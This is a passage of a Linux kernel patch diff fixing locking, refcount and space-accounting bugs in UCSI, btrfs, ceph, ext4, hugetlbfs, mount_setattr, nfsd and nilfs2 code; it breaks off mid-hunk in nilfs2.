+@@ -831,7 +831,9 @@ static void ucsi_handle_connector_change(struct work_struct *work)
+ 
+ 	clear_bit(EVENT_PENDING, &con->ucsi->flags);
+ 
++	mutex_lock(&ucsi->ppm_lock);
+ 	ret = ucsi_acknowledge_connector_change(ucsi);
++	mutex_unlock(&ucsi->ppm_lock);
+ 	if (ret)
+ 		dev_err(ucsi->dev, "%s: ACK failed (%d)", __func__, ret);
+ 
+diff --git a/drivers/usb/typec/ucsi/ucsi_acpi.c b/drivers/usb/typec/ucsi/ucsi_acpi.c
+index 217355f1f9b94..26171c5d3c61c 100644
+--- a/drivers/usb/typec/ucsi/ucsi_acpi.c
++++ b/drivers/usb/typec/ucsi/ucsi_acpi.c
+@@ -73,9 +73,13 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 				const void *val, size_t val_len)
+ {
+ 	struct ucsi_acpi *ua = ucsi_get_drvdata(ucsi);
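++	/* ACK completions are signalled separately from command completions. */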
++	bool ack = UCSI_COMMAND(*(u64 *)val) == UCSI_ACK_CC_CI;
+ 	int ret;
+ 
+-	set_bit(COMMAND_PENDING, &ua->flags);
++	if (ack)
++		set_bit(ACK_PENDING, &ua->flags);
++	else
++		set_bit(COMMAND_PENDING, &ua->flags);
+ 
+ 	ret = ucsi_acpi_async_write(ucsi, offset, val, val_len);
+ 	if (ret)
+@@ -85,7 +89,10 @@ static int ucsi_acpi_sync_write(struct ucsi *ucsi, unsigned int offset,
+ 		ret = -ETIMEDOUT;
+ 
+ out_clear_bit:
+-	clear_bit(COMMAND_PENDING, &ua->flags);
++	if (ack)
++		clear_bit(ACK_PENDING, &ua->flags);
++	else
++		clear_bit(COMMAND_PENDING, &ua->flags);
+ 
+ 	return ret;
+ }
+@@ -142,8 +149,10 @@ static void ucsi_acpi_notify(acpi_handle handle, u32 event, void *data)
+ 	if (UCSI_CCI_CONNECTOR(cci))
+ 		ucsi_connector_change(ua->ucsi, UCSI_CCI_CONNECTOR(cci));
+ 
+-	if (test_bit(COMMAND_PENDING, &ua->flags) &&
+-	    cci & (UCSI_CCI_ACK_COMPLETE | UCSI_CCI_COMMAND_COMPLETE))
++	if (cci & UCSI_CCI_ACK_COMPLETE && test_bit(ACK_PENDING, &ua->flags))
++		complete(&ua->complete);
++	if (cci & UCSI_CCI_COMMAND_COMPLETE &&
++	    test_bit(COMMAND_PENDING, &ua->flags))
+ 		complete(&ua->complete);
+ }
+ 
+diff --git a/fs/btrfs/block-group.c b/fs/btrfs/block-group.c
+index 08017b180a10d..9f77565bd7f5a 100644
+--- a/fs/btrfs/block-group.c
++++ b/fs/btrfs/block-group.c
+@@ -1318,6 +1318,7 @@ static bool clean_pinned_extents(struct btrfs_trans_handle *trans,
+  */
+ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ {
++	LIST_HEAD(retry_list);
+ 	struct btrfs_block_group *block_group;
+ 	struct btrfs_space_info *space_info;
+ 	struct btrfs_trans_handle *trans;
+@@ -1339,6 +1340,7 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 
+ 	spin_lock(&fs_info->unused_bgs_lock);
+ 	while (!list_empty(&fs_info->unused_bgs)) {
++		u64 used;
+ 		int trimming;
+ 
+ 		block_group = list_first_entry(&fs_info->unused_bgs,
+@@ -1374,9 +1376,9 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 			goto next;
+ 		}
+ 
++		spin_lock(&space_info->lock);
+ 		spin_lock(&block_group->lock);
+-		if (block_group->reserved || block_group->pinned ||
+-		    block_group->used || block_group->ro ||
++		if (btrfs_is_block_group_used(block_group) || block_group->ro ||
+ 		    list_is_singular(&block_group->list)) {
+ 			/*
+ 			 * We want to bail if we made new allocations or have
+@@ -1386,10 +1388,49 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 			 */
+ 			trace_btrfs_skip_unused_block_group(block_group);
+ 			spin_unlock(&block_group->lock);
++			spin_unlock(&space_info->lock);
++			up_write(&space_info->groups_sem);
++			goto next;
++		}
++
++		/*
++		 * The block group may be unused but there may be space reserved
++		 * against it due to its existence, that is,
++		 * space_info->bytes_may_use was incremented by a task but no
++		 * space was yet allocated from the block group by the task.
++		 * That space may or may not be allocated, as we are generally
++		 * pessimistic about space reservation for metadata as well as
++		 * for data when using compression (as we reserve space based on
++		 * the worst case, when data can't be compressed, and before
++		 * actually attempting compression, before starting writeback).
++		 *
++		 * So check if the total space of the space_info minus the size
++		 * of this block group is less than the used space of the
++		 * space_info - if that's the case, then it means we have tasks
++		 * that might be relying on the block group in order to allocate
++		 * extents, and add back the block group to the unused list when
++		 * we finish, so that we retry later in case no tasks ended up
++		 * needing to allocate extents from the block group.
++		 */
++		used = btrfs_space_info_used(space_info, true);
++		if (space_info->total_bytes - block_group->length < used) {
++			/*
++			 * Add a reference for the list, compensate for the ref
++			 * drop under the "next" label for the
++			 * fs_info->unused_bgs list.
++			 */
++			btrfs_get_block_group(block_group);
++			list_add_tail(&block_group->bg_list, &retry_list);
++
++			trace_btrfs_skip_unused_block_group(block_group);
++			spin_unlock(&block_group->lock);
++			spin_unlock(&space_info->lock);
+ 			up_write(&space_info->groups_sem);
+ 			goto next;
+ 		}
++
+ 		spin_unlock(&block_group->lock);
++		spin_unlock(&space_info->lock);
+ 
+ 		/* We don't want to force the issue, only flip if it's ok. */
+ 		ret = inc_block_group_ro(block_group, 0);
+@@ -1513,12 +1554,16 @@ void btrfs_delete_unused_bgs(struct btrfs_fs_info *fs_info)
+ 		btrfs_put_block_group(block_group);
+ 		spin_lock(&fs_info->unused_bgs_lock);
+ 	}
++	list_splice_tail(&retry_list, &fs_info->unused_bgs);
+ 	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 	return;
+ 
+ flip_async:
+ 	btrfs_end_transaction(trans);
++	spin_lock(&fs_info->unused_bgs_lock);
++	list_splice_tail(&retry_list, &fs_info->unused_bgs);
++	spin_unlock(&fs_info->unused_bgs_lock);
+ 	mutex_unlock(&fs_info->reclaim_bgs_lock);
+ 	btrfs_put_block_group(block_group);
+ 	btrfs_discard_punt_unused_bgs_list(fs_info);
+diff --git a/fs/btrfs/block-group.h b/fs/btrfs/block-group.h
+index 47a2dcbfee255..bace40a006379 100644
+--- a/fs/btrfs/block-group.h
++++ b/fs/btrfs/block-group.h
+@@ -241,6 +241,13 @@ static inline u64 btrfs_block_group_end(struct btrfs_block_group *block_group)
+ 	return (block_group->start + block_group->length);
+ }
+ 
++static inline bool btrfs_is_block_group_used(const struct btrfs_block_group *bg)
++{
++	lockdep_assert_held(&bg->lock);
++
++	return (bg->used > 0 || bg->reserved > 0 || bg->pinned > 0);
++}
++
+ static inline bool btrfs_is_block_group_data_only(
+ 					struct btrfs_block_group *block_group)
+ {
+diff --git a/fs/btrfs/delalloc-space.c b/fs/btrfs/delalloc-space.c
+index f2bc5563c0f92..63b7fa7067434 100644
+--- a/fs/btrfs/delalloc-space.c
++++ b/fs/btrfs/delalloc-space.c
+@@ -243,7 +243,6 @@ static void btrfs_calculate_inode_block_rsv_size(struct btrfs_fs_info *fs_info,
+ 	struct btrfs_block_rsv *block_rsv = &inode->block_rsv;
+ 	u64 reserve_size = 0;
+ 	u64 qgroup_rsv_size = 0;
+-	u64 csum_leaves;
+ 	unsigned outstanding_extents;
+ 
+ 	lockdep_assert_held(&inode->lock);
+@@ -258,10 +257,12 @@ static void btrfs_calculate_inode_block_rsv_size(struct btrfs_fs_info *fs_info,
+ 						outstanding_extents);
+ 		reserve_size += btrfs_calc_metadata_size(fs_info, 1);
+ 	}
+-	csum_leaves = btrfs_csum_bytes_to_leaves(fs_info,
+-						 inode->csum_bytes);
+-	reserve_size += btrfs_calc_insert_metadata_size(fs_info,
+-							csum_leaves);
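++	/* NODATASUM inodes never add csum items, so no csum tree space is needed. */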
++	if (!(inode->flags & BTRFS_INODE_NODATASUM)) {
++		u64 csum_leaves;
++
++		csum_leaves = btrfs_csum_bytes_to_leaves(fs_info, inode->csum_bytes);
++		reserve_size += btrfs_calc_insert_metadata_size(fs_info, csum_leaves);
++	}
+ 	/*
+ 	 * For qgroup rsv, the calculation is very simple:
+ 	 * account one nodesize for each outstanding extent
+@@ -276,14 +277,20 @@ static void btrfs_calculate_inode_block_rsv_size(struct btrfs_fs_info *fs_info,
+ 	spin_unlock(&block_rsv->lock);
+ }
+ 
+-static void calc_inode_reservations(struct btrfs_fs_info *fs_info,
++static void calc_inode_reservations(struct btrfs_inode *inode,
+ 				    u64 num_bytes, u64 disk_num_bytes,
+ 				    u64 *meta_reserve, u64 *qgroup_reserve)
+ {
++	struct btrfs_fs_info *fs_info = inode->root->fs_info;
+ 	u64 nr_extents = count_max_extents(fs_info, num_bytes);
+-	u64 csum_leaves = btrfs_csum_bytes_to_leaves(fs_info, disk_num_bytes);
++	u64 csum_leaves;
+ 	u64 inode_update = btrfs_calc_metadata_size(fs_info, 1);
+ 
++	if (inode->flags & BTRFS_INODE_NODATASUM)
++		csum_leaves = 0;
++	else
++		csum_leaves = btrfs_csum_bytes_to_leaves(fs_info, disk_num_bytes);
++
+ 	*meta_reserve = btrfs_calc_insert_metadata_size(fs_info,
+ 						nr_extents + csum_leaves);
+ 
+@@ -335,7 +342,7 @@ int btrfs_delalloc_reserve_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 	 * everything out and try again, which is bad.  This way we just
+ 	 * over-reserve slightly, and clean up the mess when we are done.
+ 	 */
+-	calc_inode_reservations(fs_info, num_bytes, disk_num_bytes,
++	calc_inode_reservations(inode, num_bytes, disk_num_bytes,
+ 				&meta_reserve, &qgroup_reserve);
+ 	ret = btrfs_qgroup_reserve_meta_prealloc(root, qgroup_reserve, true,
+ 						 noflush);
+@@ -356,7 +363,8 @@ int btrfs_delalloc_reserve_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 	spin_lock(&inode->lock);
+ 	nr_extents = count_max_extents(fs_info, num_bytes);
+ 	btrfs_mod_outstanding_extents(inode, nr_extents);
+-	inode->csum_bytes += disk_num_bytes;
++	if (!(inode->flags & BTRFS_INODE_NODATASUM))
++		inode->csum_bytes += disk_num_bytes;
+ 	btrfs_calculate_inode_block_rsv_size(fs_info, inode);
+ 	spin_unlock(&inode->lock);
+ 
+@@ -390,7 +398,8 @@ void btrfs_delalloc_release_metadata(struct btrfs_inode *inode, u64 num_bytes,
+ 
+ 	num_bytes = ALIGN(num_bytes, fs_info->sectorsize);
+ 	spin_lock(&inode->lock);
+-	inode->csum_bytes -= num_bytes;
++	if (!(inode->flags & BTRFS_INODE_NODATASUM))
++		inode->csum_bytes -= num_bytes;
+ 	btrfs_calculate_inode_block_rsv_size(fs_info, inode);
+ 	spin_unlock(&inode->lock);
+ 
+diff --git a/fs/btrfs/disk-io.c b/fs/btrfs/disk-io.c
+index 40152458e7b74..0d1b05ded1e35 100644
+--- a/fs/btrfs/disk-io.c
++++ b/fs/btrfs/disk-io.c
+@@ -1662,8 +1662,17 @@ static struct btrfs_root *btrfs_get_root_ref(struct btrfs_fs_info *fs_info,
+ again:
+ 	root = btrfs_lookup_fs_root(fs_info, objectid);
+ 	if (root) {
+-		/* Shouldn't get preallocated anon_dev for cached roots */
+-		ASSERT(!anon_dev);
++		/*
++		 * Some other caller may have read out the newly inserted
++		 * subvolume already (for things like backref walk etc).  Not
++		 * that common but still possible.  In that case, we just need
++		 * to free the anon_dev.
++		 */
++		if (unlikely(anon_dev)) {
++			free_anon_bdev(anon_dev);
++			anon_dev = 0;
++		}
++
+ 		if (check_ref && btrfs_root_refs(&root->root_item) == 0) {
+ 			btrfs_put_root(root);
+ 			return ERR_PTR(-ENOENT);
+diff --git a/fs/btrfs/inode.c b/fs/btrfs/inode.c
+index 82f92b5652a77..f7f4bcc094642 100644
+--- a/fs/btrfs/inode.c
++++ b/fs/btrfs/inode.c
+@@ -3364,8 +3364,23 @@ int btrfs_finish_ordered_io(struct btrfs_ordered_extent *ordered_extent)
+ 			unwritten_start += logical_len;
+ 		clear_extent_uptodate(io_tree, unwritten_start, end, NULL);
+ 
+-		/* Drop extent maps for the part of the extent we didn't write. */
+-		btrfs_drop_extent_map_range(inode, unwritten_start, end, false);
++		/*
++		 * Drop extent maps for the part of the extent we didn't write.
++		 *
++		 * We have an exception here for the free_space_inode, this is
++		 * because when we do btrfs_get_extent() on the free space inode
++		 * we will search the commit root.  If this is a new block group
++		 * we won't find anything, and we will trip over the assert in
++		 * writepage where we do ASSERT(em->block_start !=
++		 * EXTENT_MAP_HOLE).
++		 *
++		 * Theoretically we could also skip this for any NOCOW extent as
++		 * we don't mess with the extent map tree in the NOCOW case, but
++		 * for now simply skip this if we are the free space inode.
++		 */
++		if (!btrfs_is_free_space_inode(inode))
++			btrfs_drop_extent_map_range(inode, unwritten_start,
++						    end, false);
+ 
+ 		/*
+ 		 * If the ordered extent had an IOERR or something else went
+@@ -10774,6 +10789,13 @@ ssize_t btrfs_do_encoded_write(struct kiocb *iocb, struct iov_iter *from,
+ 	if (encoded->encryption != BTRFS_ENCODED_IO_ENCRYPTION_NONE)
+ 		return -EINVAL;
+ 
++	/*
++	 * Compressed extents should always have checksums, so error out if we
++	 * have a NOCOW file or the inode was created while mounted with NODATASUM.
++	 */
++	if (inode->flags & BTRFS_INODE_NODATASUM)
++		return -EINVAL;
++
+ 	orig_count = iov_iter_count(from);
+ 
+ 	/* The extent size must be sane. */
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index 8516c70b5edc1..196e222749ccd 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -4695,6 +4695,11 @@ static long btrfs_ioctl_qgroup_create(struct file *file, void __user *arg)
+ 		goto out;
+ 	}
+ 
++	if (sa->create && is_fstree(sa->qgroupid)) {
++		ret = -EINVAL;
++		goto out;
++	}
++
+ 	trans = btrfs_join_transaction(root);
+ 	if (IS_ERR(trans)) {
+ 		ret = PTR_ERR(trans);
+diff --git a/fs/btrfs/qgroup.c b/fs/btrfs/qgroup.c
+index 96ec9ccc2ef61..b3472bf6b288f 100644
+--- a/fs/btrfs/qgroup.c
++++ b/fs/btrfs/qgroup.c
+@@ -1635,6 +1635,15 @@ int btrfs_create_qgroup(struct btrfs_trans_handle *trans, u64 qgroupid)
+ 	return ret;
+ }
+ 
++static bool qgroup_has_usage(struct btrfs_qgroup *qgroup)
++{
++	return (qgroup->rfer > 0 || qgroup->rfer_cmpr > 0 ||
++		qgroup->excl > 0 || qgroup->excl_cmpr > 0 ||
++		qgroup->rsv.values[BTRFS_QGROUP_RSV_DATA] > 0 ||
++		qgroup->rsv.values[BTRFS_QGROUP_RSV_META_PREALLOC] > 0 ||
++		qgroup->rsv.values[BTRFS_QGROUP_RSV_META_PERTRANS] > 0);
++}
++
+ int btrfs_remove_qgroup(struct btrfs_trans_handle *trans, u64 qgroupid)
+ {
+ 	struct btrfs_fs_info *fs_info = trans->fs_info;
+@@ -1654,6 +1663,11 @@ int btrfs_remove_qgroup(struct btrfs_trans_handle *trans, u64 qgroupid)
+ 		goto out;
+ 	}
+ 
++	if (is_fstree(qgroupid) && qgroup_has_usage(qgroup)) {
++		ret = -EBUSY;
++		goto out;
++	}
++
+ 	/* Check if there are no children of this qgroup */
+ 	if (!list_empty(&qgroup->members)) {
+ 		ret = -EBUSY;
+diff --git a/fs/btrfs/send.c b/fs/btrfs/send.c
+index 4a4d65b5e24f7..a75669972dc73 100644
+--- a/fs/btrfs/send.c
++++ b/fs/btrfs/send.c
+@@ -7852,7 +7852,7 @@ long btrfs_ioctl_send(struct inode *inode, struct btrfs_ioctl_send_args *arg)
+ 	}
+ 
+ 	if (arg->flags & ~BTRFS_SEND_FLAG_MASK) {
+-		ret = -EINVAL;
++		ret = -EOPNOTSUPP;
+ 		goto out;
+ 	}
+ 
+diff --git a/fs/ceph/caps.c b/fs/ceph/caps.c
+index 111938a6307e6..57603782e7e2a 100644
+--- a/fs/ceph/caps.c
++++ b/fs/ceph/caps.c
+@@ -1391,7 +1391,7 @@ static void __prep_cap(struct cap_msg_args *arg, struct ceph_cap *cap,
+ 	if (flushing & CEPH_CAP_XATTR_EXCL) {
+ 		arg->old_xattr_buf = __ceph_build_xattrs_blob(ci);
+ 		arg->xattr_version = ci->i_xattrs.version;
+-		arg->xattr_buf = ci->i_xattrs.blob;
++		arg->xattr_buf = ceph_buffer_get(ci->i_xattrs.blob);
+ 	} else {
+ 		arg->xattr_buf = NULL;
+ 		arg->old_xattr_buf = NULL;
+@@ -1457,6 +1457,7 @@ static void __send_cap(struct cap_msg_args *arg, struct ceph_inode_info *ci)
+ 	encode_cap_msg(msg, arg);
+ 	ceph_con_send(&arg->session->s_con, msg);
+ 	ceph_buffer_put(arg->old_xattr_buf);
++	ceph_buffer_put(arg->xattr_buf);
+ 	if (arg->wake)
+ 		wake_up_all(&ci->i_cap_wq);
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index 40903c172a34f..1a310ee7d9e55 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -1785,11 +1785,6 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 	mb_check_buddy(e4b);
+ 	mb_free_blocks_double(inode, e4b, first, count);
+ 
+-	this_cpu_inc(discard_pa_seq);
+-	e4b->bd_info->bb_free += count;
+-	if (first < e4b->bd_info->bb_first_free)
+-		e4b->bd_info->bb_first_free = first;
+-
+ 	/* access memory sequentially: check left neighbour,
+ 	 * clear range and then check right neighbour
+ 	 */
+@@ -1803,23 +1798,31 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 		struct ext4_sb_info *sbi = EXT4_SB(sb);
+ 		ext4_fsblk_t blocknr;
+ 
++		/*
++		 * Fastcommit replay can free already freed blocks which
++		 * corrupts allocation info. Regenerate it.
++		 */
++		if (sbi->s_mount_state & EXT4_FC_REPLAY) {
++			mb_regenerate_buddy(e4b);
++			goto check;
++		}
++
+ 		blocknr = ext4_group_first_block_no(sb, e4b->bd_group);
+ 		blocknr += EXT4_C2B(sbi, block);
+-		if (!(sbi->s_mount_state & EXT4_FC_REPLAY)) {
+-			ext4_grp_locked_error(sb, e4b->bd_group,
+-					      inode ? inode->i_ino : 0,
+-					      blocknr,
+-					      "freeing already freed block (bit %u); block bitmap corrupt.",
+-					      block);
+-			ext4_mark_group_bitmap_corrupted(
+-				sb, e4b->bd_group,
++		ext4_grp_locked_error(sb, e4b->bd_group,
++				      inode ? inode->i_ino : 0, blocknr,
++				      "freeing already freed block (bit %u); block bitmap corrupt.",
++				      block);
++		ext4_mark_group_bitmap_corrupted(sb, e4b->bd_group,
+ 				EXT4_GROUP_INFO_BBITMAP_CORRUPT);
+-		} else {
+-			mb_regenerate_buddy(e4b);
+-		}
+-		goto done;
++		return;
+ 	}
+ 
++	this_cpu_inc(discard_pa_seq);
++	e4b->bd_info->bb_free += count;
++	if (first < e4b->bd_info->bb_first_free)
++		e4b->bd_info->bb_first_free = first;
++
+ 	/* let's maintain fragments counter */
+ 	if (left_is_free && right_is_free)
+ 		e4b->bd_info->bb_fragments--;
+@@ -1844,9 +1847,9 @@ static void mb_free_blocks(struct inode *inode, struct ext4_buddy *e4b,
+ 	if (first <= last)
+ 		mb_buddy_mark_free(e4b, first >> 1, last >> 1);
+ 
+-done:
+ 	mb_set_largest_free_order(sb, e4b->bd_info);
+ 	mb_update_avg_fragment_size(sb, e4b->bd_info);
++check:
+ 	mb_check_buddy(e4b);
+ }
+ 
+diff --git a/fs/ext4/move_extent.c b/fs/ext4/move_extent.c
+index dedc9d445f243..8e3ff150bc36b 100644
+--- a/fs/ext4/move_extent.c
++++ b/fs/ext4/move_extent.c
+@@ -621,6 +621,7 @@ ext4_move_extents(struct file *o_filp, struct file *d_filp, __u64 orig_blk,
+ 		goto out;
+ 	o_end = o_start + len;
+ 
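++	/* Accumulate progress chunk by chunk as extents are actually swapped. */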
++	*moved_len = 0;
+ 	while (o_start < o_end) {
+ 		struct ext4_extent *ex;
+ 		ext4_lblk_t cur_blk, next_blk;
+@@ -675,7 +676,7 @@ ext4_move_extents(struct file *o_filp, struct file *d_filp, __u64 orig_blk,
+ 		 */
+ 		ext4_double_up_write_data_sem(orig_inode, donor_inode);
+ 		/* Swap original branches with new branches */
+-		move_extent_per_page(o_filp, donor_inode,
++		*moved_len += move_extent_per_page(o_filp, donor_inode,
+ 				     orig_page_index, donor_page_index,
+ 				     offset_in_page, cur_len,
+ 				     unwritten, &ret);
+@@ -685,9 +686,6 @@ ext4_move_extents(struct file *o_filp, struct file *d_filp, __u64 orig_blk,
+ 		o_start += cur_len;
+ 		d_start += cur_len;
+ 	}
+-	*moved_len = o_start - orig_blk;
+-	if (*moved_len > len)
+-		*moved_len = len;
+ 
+ out:
+ 	if (*moved_len) {
+diff --git a/fs/hugetlbfs/inode.c b/fs/hugetlbfs/inode.c
+index 8eea709e36599..4fe4b3393e71c 100644
+--- a/fs/hugetlbfs/inode.c
++++ b/fs/hugetlbfs/inode.c
+@@ -123,6 +123,7 @@ static int hugetlbfs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 	loff_t len, vma_len;
+ 	int ret;
+ 	struct hstate *h = hstate_file(file);
++	vm_flags_t vm_flags;
+ 
+ 	/*
+ 	 * vma address alignment (but not the pgoff alignment) has
+@@ -164,10 +165,20 @@ static int hugetlbfs_file_mmap(struct file *file, struct vm_area_struct *vma)
+ 	file_accessed(file);
+ 
+ 	ret = -ENOMEM;
++
++	vm_flags = vma->vm_flags;
++	/*
++	 * for SHM_HUGETLB, the pages are reserved in the shmget() call so skip
++	 * reserving here. Note: only for SHM hugetlbfs file, the inode
++	 * flag S_PRIVATE is set.
++	 */
++	if (inode->i_flags & S_PRIVATE)
++		vm_flags |= VM_NORESERVE;
++
+ 	if (!hugetlb_reserve_pages(inode,
+ 				vma->vm_pgoff >> huge_page_order(h),
+ 				len >> huge_page_shift(h), vma,
+-				vma->vm_flags))
++				vm_flags))
+ 		goto out;
+ 
+ 	ret = 0;
+@@ -1350,6 +1361,7 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ {
+ 	struct hugetlbfs_fs_context *ctx = fc->fs_private;
+ 	struct fs_parse_result result;
++	struct hstate *h;
+ 	char *rest;
+ 	unsigned long ps;
+ 	int opt;
+@@ -1394,11 +1406,12 @@ static int hugetlbfs_parse_param(struct fs_context *fc, struct fs_parameter *par
+ 
+ 	case Opt_pagesize:
+ 		ps = memparse(param->string, &rest);
+-		ctx->hstate = size_to_hstate(ps);
+-		if (!ctx->hstate) {
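++		/* Validate the requested page size before overwriting ctx->hstate. */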
++		h = size_to_hstate(ps);
++		if (!h) {
+ 			pr_err("Unsupported page size %lu MB\n", ps / SZ_1M);
+ 			return -EINVAL;
+ 		}
++		ctx->hstate = h;
+ 		return 0;
+ 
+ 	case Opt_min_size:
+diff --git a/fs/namespace.c b/fs/namespace.c
+index 29a8d90dd1072..1533550f73567 100644
+--- a/fs/namespace.c
++++ b/fs/namespace.c
+@@ -4172,10 +4172,15 @@ static int do_mount_setattr(struct path *path, struct mount_kattr *kattr)
+ 	/*
+ 	 * If this is an attached mount make sure it's located in the callers
+ 	 * mount namespace. If it's not don't let the caller interact with it.
+-	 * If this is a detached mount make sure it has an anonymous mount
+-	 * namespace attached to it, i.e. we've created it via OPEN_TREE_CLONE.
++	 *
++	 * If this mount doesn't have a parent it's most often simply a
++	 * detached mount with an anonymous mount namespace. IOW, something
++	 * that's simply not attached yet. But there are apparently also users
++	 * that do change mount properties on the rootfs itself. That obviously
++	 * neither has a parent nor is it a detached mount so we cannot
++	 * unconditionally check for detached mounts.
+ 	 */
+-	if (!(mnt_has_parent(mnt) ? check_mnt(mnt) : is_anon_ns(mnt->mnt_ns)))
++	if ((mnt_has_parent(mnt) || !is_anon_ns(mnt->mnt_ns)) && !check_mnt(mnt))
+ 		goto out;
+ 
+ 	/*
+diff --git a/fs/nfsd/nfs4state.c b/fs/nfsd/nfs4state.c
+index faecdbfa01a29..b3f6dda930d8b 100644
+--- a/fs/nfsd/nfs4state.c
++++ b/fs/nfsd/nfs4state.c
+@@ -4908,10 +4908,8 @@ nfsd_break_deleg_cb(struct file_lock *fl)
+ 	 */
+ 	fl->fl_break_time = 0;
+ 
+-	spin_lock(&fp->fi_lock);
+ 	fp->fi_had_conflict = true;
+ 	nfsd_break_one_deleg(dp);
+-	spin_unlock(&fp->fi_lock);
+ 	return false;
+ }
+ 
+@@ -5499,12 +5497,13 @@ nfs4_set_delegation(struct nfsd4_open *open, struct nfs4_ol_stateid *stp,
+ 	if (status)
+ 		goto out_unlock;
+ 
++	status = -EAGAIN;
++	if (fp->fi_had_conflict)
++		goto out_unlock;
++
+ 	spin_lock(&state_lock);
+ 	spin_lock(&fp->fi_lock);
+-	if (fp->fi_had_conflict)
+-		status = -EAGAIN;
+-	else
+-		status = hash_delegation_locked(dp, fp);
++	status = hash_delegation_locked(dp, fp);
+ 	spin_unlock(&fp->fi_lock);
+ 	spin_unlock(&state_lock);
+ 
+@@ -7736,14 +7735,16 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ {
+ 	struct file_lock *fl;
+ 	int status = false;
+-	struct nfsd_file *nf = find_any_file(fp);
++	struct nfsd_file *nf;
+ 	struct inode *inode;
+ 	struct file_lock_context *flctx;
+ 
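++	/* Look up the file under fi_lock instead of taking our own reference. */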
++	spin_lock(&fp->fi_lock);
++	nf = find_any_file_locked(fp);
+ 	if (!nf) {
+ 		/* Any valid lock stateid should have some sort of access */
+ 		WARN_ON_ONCE(1);
+-		return status;
++		goto out;
+ 	}
+ 
+ 	inode = locks_inode(nf->nf_file);
+@@ -7759,7 +7760,8 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+ 		}
+ 		spin_unlock(&flctx->flc_lock);
+ 	}
+-	nfsd_file_put(nf);
++out:
++	spin_unlock(&fp->fi_lock);
+ 	return status;
+ }
+ 
+@@ -7769,10 +7771,8 @@ check_for_locks(struct nfs4_file *fp, struct nfs4_lockowner *lowner)
+  * @cstate: NFSv4 COMPOUND state
+  * @u: RELEASE_LOCKOWNER arguments
+  *
+- * The lockowner's so_count is bumped when a lock record is added
+- * or when copying a conflicting lock. The latter case is brief,
+- * but can lead to fleeting false positives when looking for
+- * locks-in-use.
++ * Check if there are any locks still held and, if not, free the lockowner
++ * and any lock state that is owned.
+  *
+  * Return values:
+  *   %nfs_ok: lockowner released or not found
+@@ -7808,10 +7808,13 @@ nfsd4_release_lockowner(struct svc_rqst *rqstp,
+ 		spin_unlock(&clp->cl_lock);
+ 		return nfs_ok;
+ 	}
+-	if (atomic_read(&lo->lo_owner.so_count) != 2) {
+-		spin_unlock(&clp->cl_lock);
+-		nfs4_put_stateowner(&lo->lo_owner);
+-		return nfserr_locks_held;
++
++	list_for_each_entry(stp, &lo->lo_owner.so_stateids, st_perstateowner) {
++		if (check_for_locks(stp->st_stid.sc_file, lo)) {
++			spin_unlock(&clp->cl_lock);
++			nfs4_put_stateowner(&lo->lo_owner);
++			return nfserr_locks_held;
++		}
+ 	}
+ 	unhash_lockowner_locked(lo);
+ 	while (!list_empty(&lo->lo_owner.so_stateids)) {
+diff --git a/fs/nilfs2/dat.c b/fs/nilfs2/dat.c
+index 9930fa901039f..1e7f653c1df7e 100644
+--- a/fs/nilfs2/dat.c
++++ b/fs/nilfs2/dat.c
+@@ -40,8 +40,21 @@ static inline struct nilfs_dat_info *NILFS_DAT_I(struct inode *dat)
+ static int nilfs_dat_prepare_entry(struct inode *dat,
+ 				   struct nilfs_palloc_req *req, int create)
+ {
+-	return nilfs_palloc_get_entry_block(dat, req->pr_entry_nr,
+-					    create, &req->pr_entry_bh);
++	int ret;
++
++	ret = nilfs_palloc_get_entry_block(dat, req->pr_entry_nr,
++					   create, &req->pr_entry_bh);
++	if (unlikely(ret == -ENOENT)) {
++		nilfs_err(dat->i_sb,
++			  "DAT doesn't have a block to manage vblocknr = %llu",
++			  (unsigned long long)req->pr_entry_nr);
++		/*
++		 * Return internal code -EINVAL to notify bmap layer of
++		 * metadata corruption.
++		 */
++		ret = -EINVAL;
++	}
++	return ret;
+ }
+ 
+ static void nilfs_dat_commit_entry(struct inode *dat,
+@@ -123,11 +136,7 @@ static void nilfs_dat_commit_free(struct inode *dat,
+ 
+ int nilfs_dat_prepare_start(struct inode *dat, struct nilfs_palloc_req *req)
+ {
+-	int ret;
+-
+-	ret = nilfs_dat_prepare_entry(dat, req, 0);
+-	WARN_ON(ret == -ENOENT);
+-	return ret;
++	return nilfs_dat_prepare_entry(dat, req, 0);
+ }
+ 
+ void nilfs_dat_commit_start(struct inode *dat, struct nilfs_palloc_req *req,
+@@ -154,10 +163,8 @@ int nilfs_dat_prepare_end(struct inode *dat, struct nilfs_palloc_req *req)
+ 	int ret;
+ 
+ 	ret = nilfs_dat_prepare_entry(dat, req, 0);
+-	if (ret < 0) {
+-		WARN_ON(ret == -ENOENT);
++	if (ret < 0)
+ 		return ret;
+-	}
+ 
+ 	kaddr = kmap_atomic(req->pr_entry_bh->b_page);
+ 	entry = nilfs_palloc_block_get_entry(dat, req->pr_entry_nr,
+diff --git a/fs/nilfs2/file.c b/fs/nilfs2/file.c
+index a265d391ffe92..822e8d95d31ef 100644
+--- a/fs/nilfs2/file.c
++++ b/fs/nilfs2/file.c
+@@ -105,7 +105,13 @@ static vm_fault_t nilfs_page_mkwrite(struct vm_fault *vmf)
+ 	nilfs_transaction_commit(inode->i_sb);
+ 
+  mapped:
+-	wait_for_stable_page(page);
++	/*
